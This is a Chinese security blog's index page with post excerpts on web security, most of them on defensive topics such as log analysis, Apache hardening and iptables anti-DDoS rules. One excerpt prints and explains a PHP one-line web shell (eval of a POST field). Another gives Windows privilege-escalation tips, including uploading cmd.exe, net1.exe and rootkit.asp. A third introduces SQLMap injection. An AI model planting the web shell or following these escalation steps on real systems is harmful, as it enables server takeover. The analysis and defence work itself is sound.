当前位置: 首页 >> Web安全
【威胁分析】<?php eval($_POST[‘a‘]);?>

【威胁分析】<?php eval($_POST[‘a‘]);?>

请求体解码为:

<?php eval($_POST['a']);?>

一句话木马。

eval():将括号内的字符串解析为php代码。

10个月前 (08-15)    Jiaozn    Web安全    379    0    全文阅读
【日志】分析Apache日志文件

【日志】分析Apache日志文件


有许多不同的软件包,可让您生成有关谁在访问您的网站以及他们在做什么的报告。目前最流行的是默认情况下在许多共享服务器上安装的“ 模拟 ”,“ Webalizer ”和“ AWStats ”。


尽管此类程序生成吸引人的报告,但它们只是从日志文件可以告诉您的内容开始。在本节中,我们研究了您可以更深入研究的方法-着重于使用简单的命令行工具,尤其是grep,awk和sed。


1.合并日志格式

以下内容假定采用Apache HTTP Server 组合日志格式,其中日志文件中的每个条目均包含以下信息:

11个月前 (07-01)    Jiaozn    Web安全    306    0    全文阅读
【知识】HTTP协议中的5类状态码

【知识】HTTP协议中的5类状态码

状态码用来告诉HTTP客户端,HTTP服务器是否产生了预期的Response。

HTTP/1.1协议中定义了5类状态码,状态码由三位数字组成,第一个数字定义了响应的类别。

● 1XX 提示信息——表示请求已被成功接收,继续处理。

● 2XX 成功——表示请求已被成功接收,理解,接受。

● 3XX 重定向——要完成请求必须进行更进一步的处理。

● 4XX 客户端错误——请求有语法错误或请求无法实现。

● 5XX 服务器端错误——服务器未能实现合法的请求

1年前 (2022-04-23)    Jiaozn    Web安全    523    0    全文阅读
【解密】网页文件被加入恶意百度跳转代码

【解密】网页文件被加入恶意百度跳转代码

网站被挂恶意代码恶意代码源码是这样的:<title>&#29066;&#29483;&#25163;&#28216;&#45;&#29066;&#29483;&#25163;&#28216;&#23448;&#26041;&#32593;&#22336;</title> <meta name="keywords" cont
3年前 (2019-12-27)    Jiaozn    Web安全    2843    0    全文阅读
【安全】Web提权内网提权思路

【安全】Web提权内网提权思路

【 web提权 】1.能不能执行cmd就看这个命令:net user,net不行就用net1,再不行就上传一个net到可写可读目录,执行/c c:\windows\temp\cookies\net1.exe user2.当提权成功,3389没开的情况下,上传开3389的vps没成功时,试试上传rootkit.asp 用刚提权的用户登录进去就是system权限,再试试一般就可以了。3.cmd拒绝访问的话就自己上传一个cmd.exe 自己上传的后缀是不限制后缀的,cmd.exe/cmd.com/cm
4年前 (2019-09-04)    Jiaozn    Web安全    2083    0    全文阅读
【超详细】SQLMap用户手册

【超详细】SQLMap用户手册

http://192.168.136.131/sqlmap/mysql/get_int.php?id=1当给sqlmap这么一个url的时候,它会:1、判断可注入的参数2、判断可以用那种SQL注入技术来注入3、识别出哪种数据库4、根据用户选择,读取哪些数据sqlmap支持五种不同的注入模式:1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。2、基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。3、基于报错注入,即页面会
4年前 (2019-08-28)    Jiaozn    Web安全    2827    1    全文阅读
【安全】php网站安全防范(目录安全、木马防范)

【安全】php网站安全防范(目录安全、木马防范)

一、目录权限设置很重要:可以有效防范黑客上传木马文件.

如果通过 chmod 644 * -R 的话,php文件就没有权限访问了。

如果通过chmod 755 * -R 的话,php文件的权限就高了。


所以就需要分开设置目录权限和文件权限:

linux 服务器权限:经常要用到的命令:

find /path -type f -exec chmod 644 {} \; &nbs

7年前 (2016-01-25)    Jiaozn    Web安全    2839    0    全文阅读
【防御】iptables防DDOS攻击和CC攻击设置

【防御】iptables防DDOS攻击和CC攻击设置

防范DDOS攻击脚本

#防止SYN攻击 轻量级预防 

iptables -N syn-flood 

iptables -A INPUT -p tcp --syn -j syn-flood 

iptables -I syn-flood -p tcp -m limit --limit 3/s --limit-burst 6 -j RETURN 

iptables -A syn-flood -j

8年前 (2015-10-08)    Jiaozn    Web安全    3357    0    全文阅读
【防御】Linux防DDOS和CC攻击的方法

【防御】Linux防DDOS和CC攻击的方法

     虚拟主机服务商在运营过程中可能会受到黑客攻击,常见的攻击方式有SYN,DDOS等。通过更换IP,查找被攻击的站点可能避开攻击,但是中断服务的时间比较长。比较彻底的解决方法是添置硬件防火墙。不过,硬件防火墙价格比较昂贵。可以考虑利用Linux虚拟主机服务器本身提供的防火墙功能来防御。


1. 抵御SYN

SYN攻击是利用TCP/IP协议3次握手的原理,发送大量的建立连接的网络包,但不实际建立连接,最终导致被

8年前 (2015-10-08)    Jiaozn    Web安全    3821    0    全文阅读
【WEB】http 错误代码大全 200,404,503等

【WEB】http 错误代码大全 200,404,503等

常见的状态码为:

200 - 服务器成功返回网页

404 - 请求的网页不存在

503 - 服务不可用


===============================

详细分解:

1xx(临时响应)

表示临时响应并需要请求者继续执行操作的状态代码。


代码 说明

100 (继续) 请求者应当继续提出请求。服务器返回此代

8年前 (2015-08-05)    Jiaozn    Web安全    3089    0    全文阅读
【安全】Apache安全配置

【安全】Apache安全配置

1 安全策略


1.1 安全目录


.htaccess做目录安全保护的,欲读取这保护的目录需要先键入正确用户帐号与密码。这样可做为专门管理网

8年前 (2015-06-09)    Jiaozn    Web安全    3474    0    全文阅读
第1/1页

分享:

支付宝

微信